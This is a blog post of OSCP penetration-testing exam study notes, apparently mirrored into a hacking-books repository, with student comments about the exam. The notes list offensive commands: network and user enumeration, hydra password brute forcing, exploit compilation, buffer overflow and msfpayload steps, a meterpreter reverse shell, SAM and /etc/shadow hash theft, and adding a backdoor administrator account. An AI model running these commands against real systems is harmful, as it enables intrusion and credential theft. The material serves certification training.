CoCalc -- OSCP Notes by Ash.txt

GitHub Repository: XCHADXFAQ77X/HACKING-BOOKS-X
Path: blob/master/7-part-100-article/OSCP Notes by Ash.txt
³¹⁷ views
1
OSCP Notes by Ash
2

3
Reference Site:  http://security.crudtastic.com/?p=213
4

5

6

7
Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.
8

9

10

11
Scan network for live hosts
12

13
(nmap/zenmap)
14

15
For NMAP –
16

17

18
nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt
19

20
cat hosts_up.txt | grep -i “up”
21

22

23

24

25
nmap -PN 192.168.9.200-254
26

27
(this will also show open ports for each host)
28

29

30

31

32
Identify OS
33

34
(nmap/zenmap)
35

36
For NMAP –
37

38

39
nmap -O 192.168.0.100 (just OS fingerprint)
40

41

42
nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traceroute)
43

44

45

46

47
Check hosts for services
48

49
(nmap/zenmap)
50

51
For NMAP
52

53
- nmap -sS 192.168.9.254 (TCP)
54

55
- nmap -sU 192.168.9.254 (UDP)
56

57
(Could be better to do this in zenmap and group servers by services)
58

59

60
FOR SNMP
61

62
-  snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f
63

64

65
For a known port
66

67
- nmap – p 139 192.168.9.254
68

69

70

71
DNS Lookups/Hostnames
72

73

74
host -l <domain> <dns server>
75

76
e.g. host -l acme.local 192.168.0.220
77

78

79

80

81
Banner grab/Version services
82

83
(nmap/zenmap/SNMP)
84

85
Check versions of software/services against milw0rm and security focus)
86

87

88
For NMAP
89

90
- nmap -sV 192.168.9.254
91

92

93

94
For SNMP
95

96
snmpenum -t 192.168.0.100 (displays all snmp informations for that server)
97

98

99

100
For SMTP
101

102
nc -v <mailserver> 25
103

104
- Will give mailserver version. Can also VRFY to find valid usernames/email accounts
105

106

107

108
Netbios/SMB
109

110
- smb4k (graphical interface – lists shares)
111

112

113
- smbserverscan
114

115

116
- metasploit auxiliary scanner
117

118
./msfconsole
119

120
show
121

122
use scanner/smb/version
123

124
set RHOSTS 192.168.0.1-192.168.0.254
125

126
run
127

128

129

130

131
Enumerate Usernames
132

133
(SNMP/SMTP/SMB[NETBIOS]/Add others here)
134

135

136
For SMB
137

138
- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)
139

140
(on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)
141

142

143
For SNMP
144

145
- nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)
146

147
- snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4
148

149

150
For SMTP – (/pentest/enumeration/vrfy)
151

152
- ./smtp_VRFY.py <mailserver IP>
153

154
** NEED TO MAKE THREADED – VERY SLOW **
155

156

157
SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)
158

159
- ./samrdump.py SNMP server
160

161

162
*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***
163

164
*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***
165

166

167

168

169

170
Crack Passwords
171

172
(hydra/THC bruter)
173

174
(need mil-dict.txt from Milw0rm – cracked hashs)
175

176

177
FTP – hydra -l <username> -P mil-dic.txt -f <FTP SERVER> ftp -V
178

179

180
POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)
181

182

183
SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> -V
184

185

186
MS VPN – dos2unix words (whatever word list)
187

188
cat words | thc-pptp-bruter VPN server
189

190

191

192
Look for known vulnerable services
193

194
(refer nmap/zenmap output)
195

196
Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
197

198

199

200

201
Compile exploit code if possible
202

203
(milw0rm archive)
204

205

206
cd /pentest/exploits/milw0rm
207

208
cat sploitlist.txt | grep -i [exploit]
209

210

211
Some exploits may be written for compilation under Windows, while others for Linux.
212

213
You can identify the environment by inspecting the headers.
214

215
cat exploit | grep “#include”
216

217

218
Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h
219

220
Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
221

222

223
Grep out Windows headers, to leave only Linux based exploits:
224

225
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
226

227

228
LINUX
229

230
gcc -o dcom 66.c
231

232
./dcom
233

234

235

236
WINDOWS
237
cd /root/.wine/drive_c/MinGW/bin
238
wine gcc -o ability.exe ability.c -lwsock32
239
wine ability.exe (to run compiled file)
240

241

242

243

244
Wireshark Filters
245

246

247
To filter out all traffic for IP 192.168.0.100
248

249
!(IP.ADDR == 192.168.0.100)
250

251

252

253

254
FUZZING STEPS – ASH STYLE
255

256
    Determine target application and operating system
257
    Obtain a copy of the application
258
    Analyse the RFC & communication protocols
259
    Discover & record crash conditions
260
    Analyse crash conditions for exploitation opportunities
261

262
Things we need to know
263

264
    Which 4 bytes overwrite EIP
265
    Do we have enough space in buffer for shellcode
266
    Is this shellcode easily  accessible in memory
267
    Does the application filter out any characters
268
    Will we encounter overflow protection mechanisms
269

270

271
(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)
272

273
Creating pattern for EIP location
274
- framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script)
275
– then look in ollydbg for pattern (need to reverse it and convert)
276

277
- pattern_offset.rb <EIP PATTERN>
278
– will show byte offset
279

280
Creating shellcode
281
(in framework3)
282
./msfpayload |grep -i shell
283

284
./msfpayload …… o (for options)
285
./msfpayload …… c (to create)
286
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
287

288
CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
289

290

291
Finding an exploit
292
/pentest/exploits/milw0rm
293
grep <exploit> sploitlist.txt
294

295

296
MSFCLI (p243)
297
./msfcli
298
-o options
299
-p payloads
300
-t test
301
-e exploit
302

303
MSFCONSOLE
304
sessions -l => list created sessions
305
sessions -i # => interact with specific session number
306

307
show options
308

309
search <string>
310

311
use exploit/ …..
312
set PAYLOAD ….
313

314
exploit
315

316

317
Meterpreter Payloads (p260)
318
payload = windows/meterpreter/reverse_tcp ….
319

320
meterpreter> help (lists all commands)
321

322
upload <file> c:\\windows
323

324
download c:\\windows\\repair\\sam /tmp
325

326
ps (running tasks)
327

328
execute -f cmd -c (creates a new channel with the cmd shell)
329
interact # (interacts with channel)
330

331

332
Other useful windows commands
333
net user ash my_password /add
334
net localgroup administrators ash /add
335

336

337
Passwords & Hashes
338
Windows SAM => %systemroot%\Repair
339
(pwdump or fgdump – p340)
340

341
or use framework meterpreter shell => gethashes
342

343
Linux => /etc/passwd & /etc/shadow
344

345

346
John The Ripper
347
for linux => unshadow passwd & shadow file to another file
348

349
./john hashes.txt
350

351

352

353
Associated Documents
354

355
Common Ports – packetlife.net/media/library/23/common-ports.pdf
356
Wireshark – http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
357
TCPDUMP – http://packetlife.net/media/library/12/tcpdump.pdf
358
SANS NETCAT – http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
359
SANS MISC TOOLS – http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
360
SANS 504 – Cant find
361

362
Tags: backtrack, offensive-security, offsec101, oscp, security, Study, training, tutorial
363
34 comments
364
2 pings
365

366
Skip to comment form ↓
367

368
    student
369

370
    December 24, 2009 at 5:00 pm (UTC 10)
371

372
    So did you pass your exam?! I started the course recently and came across your post while google knowledge hunting for OSCP ;-)
373

374
    What will you do after OSCP? There is the OSCE but after that the only thing I’ve found is CREST (for professional pen testers in the UK)
375
    Chris
376

377
    January 29, 2010 at 10:47 pm (UTC 10)
378

379
    Hi Ash, I was quite surprised to come across some writings about the OSCP challenge as I was initially looking for something on samrdump for SMB enumeration. Your list of the things for OSCP preparation is pretty close to my prep sheet.
380

381
    Unfortunately I failed the challenge. I can definitely agree that this course is very hardcore. I don’t think you can rest on your laurels! Even covering the entire content of the course I have the feeling that I’d still need to have done more outside work to get through that exam.
382

383
    I’d be interested in how you got on in any case. I’m currently going back through the course material and I hope to get some more time in the labs pretty soon to get more practice. I don’t think I spent enough time finding and using exploits, and understanding the vulnerabilities within the various OS’s and applications to get me ready for the challenge. Next time I want to make sure I have a few more things up my sleeve.
384

385
    Anyway, cheers for the information, I’d be interested in hearing about your experiences of the challenge (without obviously giving too much away)!
386

387
    Chris
388
    ash
389

390
    January 30, 2010 at 8:30 am (UTC 10)
391

392
    Hey Chris,
393

394
    I eventually passed :) It’s a hard exam!! It took me 2 attempts, and when I eventually passed it all seemed so simple and extremely rewarding!
395

396
    I think the key point here to your preparation is to do a lot of work in the labs. You should be able to root all of the lab boxes. Everything that you need to pass the exam (and you should be able to pass it the first time – just make sure to have a break so you don’t go mental like I did) is in the labs there. There is nothing really new, just some pretty cool twists and turns. I know a guy who spent 3 or 4 months in the labs making sure he could get all the machines there.. and he did the exam from start to finish in about 18 hours on his first go.
397

398
    But, I do think you are right, preparation is the key! I did a lot more work getting ready for my second attempt and managed to finish it in about 8 hours or so (mind you I knew what to expect this time)
399

400
    This isn’t an exam where you can sit down and read a book and hope to regurgitate it and pass (thats a CISSP hahaah)
401

402
    Anyway .. Good luck on your resit. I know how you feel, but you do have the upper hand now. Spend the time going over your scans, rebuild the lab scenarios if possible, poke around the labs to see if theres something similar, look in the book, ask in the irc channel .. trust me, things aren’t always as hard as they may seem (but they could be harder)!!
403

404
    And in the word of Muts – Try Harder hahahah
405
    Chris
406

407
    February 1, 2010 at 3:31 am (UTC 10)
408

409
    Thanks Ash, and congratulations! I’ll be back in the labs soon no doubt so will take your advice. Nice one, thanks. ;)
410
    yaggi
411

412
    September 2, 2010 at 2:22 am (UTC 10)
413

414
    Im glad you passed. Me, I failed… I think because of the limitations being set like 1 metasploit and no vuln scan.. I belive we can exploit this but their are tools that are not working during the recon like NMAP… Everytime you do the NMAP it says host is not UP even you will use almost all the options (i.e, -PN)
415

416
    Also, regarding the 4 machines, the instruction is confusing, it says to gain the root access. I believe the way to get the root of the 4 machines is to get an exploit in the internet and run it against the machine right?
417

418
    Hope I can pass in the next round..
419

420
    Hope you can share more information my friend.. Its hard to ask help also..I guess your site give at least an encouraging hints
421
    ash
422

423
    September 2, 2010 at 5:30 am (UTC 10)
424

425
    Dont get discouraged :)
426

427
    You can definitely nmap the machines .. check the timing (-T)
428

429
    Your first machine you have to write an exploit for .. just remember what happened in the class
430

431
    The others are the same as machines you should have done at the end of the book … there is nothing new here.
432

433
    When I resat the exam I completed it in 3 hours :) Let me know if you need to talk about this more .. good luck .. you can do it!!
434
    Yaggi
435

436
    September 2, 2010 at 6:50 pm (UTC 10)
437

438
    Hi ash,
439

440
    Maybe I forgot the timing option, instead, I used unicornscan and netcat scan.. When I get the information like banner, software version, open ports, OS, I feel like stuck since I can’t use more on vuln scanner and metasploit. I was completely stuck and i was not able to gain the confidence again.. I feel sorry that with this information at hand I can’t hack a machine. Although I can go to exploit-db, still the process for me is confusing… I pity myself.
441

442
    I really wanted to know how the 4 machines was hack.. Im not sure to take the exam again coz until now I can’t believe I failed.
443
    ash
444

445
    September 3, 2010 at 9:28 am (UTC 10)
446

447
    nah … dont quit!!
448

449
    Go back to your book and read up on what you can do. it may not be a single exploit or technique, rather multiple exploits or techniques :)
450

451
    If you can do all the exercises in the manual and get the final machines at the end of the manual, you should be fine. If you cant do them, I would suggest getting more lab time, reading the forums, and asking for some help in the IRC channel.
452

453
    There’s some awesome people about that will be more than happy to help you (they helped me greatly)
454

455
    Feel free to contact me if you need to bounce some ideas around.
456

457
    Think about trying to recreate what you scanned int he lab as virtual images so that you can sit at home and practice hacking them as well
458
    marco
459

460
    September 9, 2010 at 9:06 pm (UTC 10)
461

462
    hi ash and yhanks for yours usefull words.
463
    I failed the exam, dunno why..ehehe…i do same things you done but i cant get anything. so if u like email me and maybe we can talk about it.
464
    thanx
465
    ash
466

467
    September 10, 2010 at 6:35 am (UTC 10)
468

469
    Hi Marco .. don’t get too worried about it .. its a hard exam :)
470

471
    How many machines did you get in the exam? Where did you have troubles?
472

473
    Keep trying until you pass.. its worth it :)
474
    marco
475

476
    September 11, 2010 at 4:59 am (UTC 10)
477

478
    eheh..ya…really hard…
479
    i just exploit..0 machines… :(
480
    i got problems with exploitation and so i lose my mind…
481
    i think ive learn well and i really understand how works penetration…but…dunno why i just do nothing with the exam…
482
    ill try harder…
483
    thnx for ur help
484
    subtitles
485

486
    November 21, 2010 at 11:53 pm (UTC 10)
487

488
    Good post
489
    sean
490

491
    February 19, 2011 at 11:41 pm (UTC 10)
492

493
    Hi Ash,
494
    I have just taken the exam yesterday, and I think I have failed :0(
495
    Not a good feeling when you’ve been up all night also.
496
    I will pick myself up and have another go at it after a bit more pwnage in the labs.
497
    Just a thought.. Do they give you the same exam again? if so that will sure help.
498
    thanks
499
    ash
500

501
    February 21, 2011 at 6:25 am (UTC 10)
502

503
    hahah that exam is brutal!!
504

505
    I know how you feel .. You pretty much need to root all of the boxes to pass. Dont let it get to you in any way .. I’m sure you’ll pass it the second time.
506

507
    When I retook my exam I got the same challenges .. just different addresses. You can always practice on your own before the resit .. you should have enough information from your recon to be able to find a way to root all the boxes. After I had a good rest from my exam I had a lightbulb moment where everything seemed so much clearer and straight forward .. I ended up rooting all the boxes in next to no time when I sat it the second time.
508

509
    Good luck.. You’ll be an OSCP in no time. Post back here and let me know how you go :)
510
    Flux
511

512
    March 25, 2011 at 7:51 am (UTC 10)
513

514
    Hi Ash,
515

516
    It seems like allot op OSCP’s have found your post hehe. I’m still in my lab-faze trying harder every day and enjoying myself. I was just wondering a couple of things. Did you use XSS-vulns in the labs (ex: beef), is using msf auxiliary scanners possible during the exam, did you get into the End Goal in the labs?
517

518
    greetings
519
    Dudley
520

521
    April 17, 2012 at 9:48 pm (UTC 10)
522

523
    I’m glad to hear you passed Ash. I am studying in labs and was wondering if you have any insight as to restriction of tools on challenge? I heard that you can’t use metasploit and that has be concerned as I us it a good bit especially for pivot attacks….
524
    ash
525

526
    April 18, 2012 at 6:41 am (UTC 10)
527

528
    From when I did the exam you could only use metasploit for one of the boxes. If you have done the course you will know there is more than one way to skin a cat, and metasploit is just an easier automated way of exploit systems. As for pivoting .. theres numerous ways of doing that, and it’s all covered in the courseware :)
529

530
    Good luck
531
    Dudley
532

533
    April 19, 2012 at 12:47 am (UTC 10)
534

535
    I’ve got about 19 days left in lab and I must say I don’t feel super comfortable about taking test. I under the premise of all the exercises but have had what I would consider not such good luck in labs. I have gotten a network key and gotten into IT network but only got admin on 6 windows boxes and none of the linux boxes which bothers me. So far none of username/passwords I crack have been resused anywhere which I found odd indeed. I also wanted to know if “http://www.milw0rm.com/search.php” is still up as the site is unreachable and I’ve never been on it before. Any suggestions or helpful hints for lab would be welcome. Thanks
536
    Dudley
537

538
    April 19, 2012 at 12:54 am (UTC 10)
539

540
    I’m also week on building exploits as I’m not a programmer do you have any suggestions on what I can read or do to improve this?
541
    Dudley
542

543
    April 19, 2012 at 12:55 am (UTC 10)
544

545
    LOL I meant “weak” not “week” ………….
546
    DrS
547

548
    May 4, 2012 at 11:31 pm (UTC 10)
549

550
    Dudley, you don’t need to use Milw0rm or other websites as it is all in the exploit-db database on your backtrack machine :
551
    By mind, just go to /pentest/exploits/ and make a ‘svn update’ to update the list of public vulnerabilities -they are in sub-folders-.
552

553
    I don’t think you need great developer skills, it’s much on knowing the architecture, how a program works in memory, the network, and identify the critical points (memory access -malloc, even printf()-, database access, etc..). 99% of developers, even C developers, have no knowledge on this part which is important : a compiled program doesn’t follow exactly what a developer defines.
554

555
    Today the most common exploits vector are injections, such as SQL, XSS or session hijacking. Maybe the actual labs and the exam follow this ‘mainstream’.
556
    Dudley
557

558
    May 14, 2012 at 9:57 pm (UTC 10)
559

560
    So took the test and it kicked my butt. I got the buffer overflow written but struggled big time with other 4 machine. Thing is I’m not sure where to start with preparing for retake. one of the server was running hmailserver which I’m sure must have been vulnerable and the other box were runnin different version of FileZilla beta software but had no luck exploiting them at all LOL. Any helpful hints for preparing for retake would be great. Thanks a bunch
561
    ash
562

563
    May 15, 2012 at 7:10 pm (UTC 10)
564

565
    Well, Hopefully your scans are good enough to tell you what OSes and applications are installed on the machines in the exam. You could possibly rebuild this in your own lab environment now and work out what you need to do to root them.
566

567
    That’s where I would start my prep for a resit of the exam.
568

569
    I wouldn’t get too disheartened .. its a hard exam. One of my friends just passed it on the weekend .. and he struggled!
570
    Dudley
571

572
    May 15, 2012 at 8:07 pm (UTC 10)
573

574
    I was able to get app version but nmap was not able to get me an exact OS fingerprint :-( like in the case of hmailserver its running on either server 2003 or XP I suspect its server 2003. The filezilla beta are running on some version of freebsd and server 2003. Never messed with freebsd so not sure where to begin with that. I’m pretty all the test machine were running a firewall due to the limited services and ports enumerated on them. Any suggestion would be greatly appreciated. Thanks Ash.
575
    Dudley
576

577
    May 15, 2012 at 8:10 pm (UTC 10)
578

579
    I found this for hmailserver but could never get it to work maybe you could make some suggestions? My only guess is maybe I was doing something wrong when trying to do the exploit. Thanks
580

581
    http://www.exploit-db.com/exploits/7012/
582
    ash
583

584
    May 16, 2012 at 6:59 am (UTC 10)
585

586
    Have you done the actual course? There’s practice boxes in the lab for you to attack which are very similar to the machines for the final exam.
587

588
    You need to scan all of your hosts, enumerate services, and then look at what vulnerabilities you can exploit. You may not be able to exploit a root vulnerability straight away, you may need to just get shell on the box and then do a local privilege exploit or something.
589

590
    Go back to your manual and have a look at the process outlined in there for the best way to crack these boxes. Just because you see something obvious, it doesnt mean that its the answer .. you may find yourself going down a path that wont produce any results.
591
    Dudley
592

593
    May 16, 2012 at 8:12 pm (UTC 10)
594

595
    Yeah I did the course and thing I found was on exam that nmap scan yielded very few open ports. I’m sure the boxes had firewalls. I got one with a buffer overflow and nadda after that one :-( Should I have scanned for other hosts that weren’t being scored possibly?
596
    ash
597

598
    May 17, 2012 at 6:46 am (UTC 10)
599

600
    Did you scan for both TCP and UDP, did you do some SNMP scans .. did you try throttling your nmap scans a bit? Did you version the services on the ports you found?
601

602
    You only need to scan the servers that they have provided you .. theres no other systems to go for.
603

604
    Did you want to email me your scans so I can see what you have and maybe give you some help?
605
    Dudley
606

607
    May 17, 2012 at 8:10 pm (UTC 10)
608

609
    That would be great if you don’t mind giving me a second opinion. I’m sure I must have missed something.
610
    Dudley
611

612
    May 18, 2012 at 5:02 am (UTC 10)
613

614
    Where should I send my scan results to?
615
    Dudley
616

617
    May 21, 2012 at 7:09 pm (UTC 10)
618

619
    Hey Ash let me know where I can send my scans to to get your opinion. Thanks.
620
    marco
621

622
    June 22, 2012 at 8:21 am (UTC 10)
623

624
    Hi, i wrote some time ago…in these days i thought i never get pwb…fortunatly i was wrong…and i got it.
625
    So i can tell to everyone to listen very well this blog, because is very usefull.
626
    then think about it, i cannot complete PWB because my minds try to complicate a simple question.
627
    think easy….
628
    AK
629

630
    November 29, 2012 at 6:01 am (UTC 10)
631

632
    Hello ASH,
633

634
    I too flunked the exam but I made some kills before dieing out , glad you made it through, just a request to you , can we communicate over mails or IRC or IM anyhow?
635
    ash
636

637
    November 29, 2012 at 7:04 am (UTC 10)
638

639
    Sure, feel free to send me an email. My address is easy to find :-)
640

641
Leave a Reply
642

643
Your email address will not be published. Required fields are marked *
644

645
Name: *
646

647
Email: *
648

649
Website:
650

651
Message: *
652

653
You may use these HTML tags and attributes:
654
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
655
Product

Resources

Company
